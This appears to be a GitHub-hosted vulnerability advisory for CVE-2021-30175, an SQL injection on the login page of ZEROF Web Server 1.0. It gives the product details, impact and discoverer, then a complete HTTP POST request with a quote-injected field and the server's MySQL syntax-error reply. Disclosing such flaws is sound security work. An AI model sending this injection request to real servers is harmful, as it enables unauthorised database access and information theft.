Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2021-30175

Description

ZEROF Web Server 1.0 (April 2021 version) allows SQL Injection on login page.

Additional Information

Parameters received by the web application must be sanitized and filtered to prevent the execution of control constructs

Vulnerability Type

SQL Injection

Vendor of Product

Zerof

Affected Product Code Base

ZEROF Web Server - 1.0 (april 2021)

Affected Component

Attack Type

Remote

Impact Code execution

true

Impact Information Disclosure

true

Discoverer

  • Anna Sidorova
  • AWILLIX LLC

Attack Vectors

Example:

POST /HandleEvent HTTP/1.1
Host: zerof
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126

Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 07 Apr 2021 10:33:44 GMT
Server: ZEROF Web Server

try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}

Reference